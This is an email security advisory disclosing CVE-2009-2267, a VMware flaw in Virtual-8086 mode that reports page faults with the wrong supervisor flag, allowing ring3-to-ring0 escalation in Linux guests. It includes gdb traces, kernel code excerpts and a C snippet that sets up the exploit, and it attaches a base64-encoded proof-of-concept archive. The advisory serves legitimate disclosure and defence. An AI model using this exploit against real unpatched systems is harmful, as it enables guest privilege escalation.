--+QahgC5+KEYLbs62
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Invalid #PF Exception Code in VMware can result in Guest Privilege Escalation
-----------------------------------------------------------------------------

In protected mode, cpl is usually equal to the two least significant bits of
the cs register. However, there is an exception: in Virtual-8086 mode, the
cpl is always 3 (least privileged), regardless of the value of the cs
register.

When the processor raises a #PF (page fault) exception, an exception code is
pushed onto the stack containing flags used by the operating system to
determine the correct course of action. One of those flags is called U/S
(user/supervisor), which is set if the fault was caused while the processor
was in user mode.

In Virtual-8086 mode, when VMware emulates a far call or far jmp instruction,
it incorrectly pushes the return cs and ip on the stack using supervisory
access, causing an incorrect exception code to be delivered to the guest
kernel.

As Virtual-8086 mode allows userland code to specify an arbitrary cs register,
including the two least significant bits, an attacker can use this supervisory
access to confuse the kernel, allowing escalation of privileges.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2009-2267 to this issue. 

--------------------
Affected Software
------------------------

- VMware Workstation
- VMware Player
- VMware ACE
- VMware Server
- VMware ESX
- VMware Fusion
- Etc.

--------------------
Consequences
-----------------------

We have successfully exploited this issue on Linux guests. Other guest
operating systems may also be exploitable.

Here is what happens on an up-to-date Ubuntu Linux 8.04 guest when the kernel
handles the #PF exception with a spoofed supervisor bit in the exception code.

(gdb) x/i $pc
0x900:  call   0xaabb:0xccdd
(gdb) si
0xc031d000 in page_fault ()
(gdb) x/x $esp
0xdde15f08:     0x00000002
(gdb) x/t $esp
0xdde15f08:     00000000000000000000000000000010

Examining the condition code (error_code in the snippet below), you can see it
was caused by a data write (i.e. not an instruction fetch, the cs/eip push) in
supervisor mode to a non-present page. This is incorrect.

http://lxr.linux.no/linux+v2.6.24/arch/x86/mm/fault_32.c#L461 

 461        /* User mode accesses just cause a SIGSEGV */
 462        if (error_code & 4) {
 ...
 507no_context:
 508        /* Are we prepared to handle this kernel fault?  */
 509        if (fixup_exception(regs))
 510                return;

With a spoofed cs register, this can lead to this path (see the
SEGMENT_IS_PNP_CODE macro from segment_32.h), causing the kernel to
reach the pnp_bios_is_utter_crap code, and attempting this recovery:

http://lxr.linux.no/linux+v2.6.24/arch/x86/mm/extable_32.c#L20 

 19                printk(KERN_CRIT "PNPBIOS fault.. attempting recovery.\n");
 20                __asm__ volatile(
 21                        "movl %0, %%esp\n\t"
 22                        "jmp *%1\n\t"
 23                        : : "g" (pnp_bios_fault_esp), "g" (pnp_bios_fault_eip));
 24                panic("do_trap: can't hit this");
 25        }

pnp_bios_fault_eip and pnp_bios_fault_esp are both .bss objects, and
will be initialised to NULL. Thus, line 22 will transfer execution to
the first page.

Therefore, incorrectly reporting the supervisor bit can lead to a local
ring3->ring0 privilege escalation in guests.

/* ... */
    // Setup registers
    vm.regs.eflags = EFLAGS_TF_MASK;
    vm.regs.esp = 0xDEADBEEF;
    vm.regs.eip = 0x00000000;
    vm.regs.cs = 0x0090;
    vm.regs.ss = 0xFFFF;

    CODE16("call 0xaabb:0xccdd", code, codesize);

    vm86(Vm86Enter, &vm);
/* ... */

The attached non-weaponised proof of concept demonstrates this by
printing a message to the console from ring0.

-------------------
Solution
-----------------------

Updated software is available from the vendor at http://www.vmware.com/ 

http://www.vmware.com/security/advisories/VMSA-2009-0015.html 

-------------------
Credit
-----------------------

This bug was discovered by Tavis Ormandy and Julien Tinnes of the Google
Security Team.

-------------------
Greetz
-----------------------

Greetz to Lcamtuf, LiquidK, redpig, Neel, pipacs, spoonm, asiraP,
Jagger, and our other elite colleagues.

Additional greetz to everyone at $1$K2XTi4ZA$H5Y197fbrMk85ZWzNw/Nm0.

Enjoy some photography while at ring0 @ http://flickr.com/meder 

-- 
-------------------------------------
taviso@sdf.lonestar.org | finger me for my gpg key. 
-------------------------------------------------------

--+QahgC5+KEYLbs62
Content-Type: application/x-gzip
Content-Disposition: attachment; filename="vmware86.tar.gz"
Content-Transfer-Encoding: base64

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
--+QahgC5+KEYLbs62--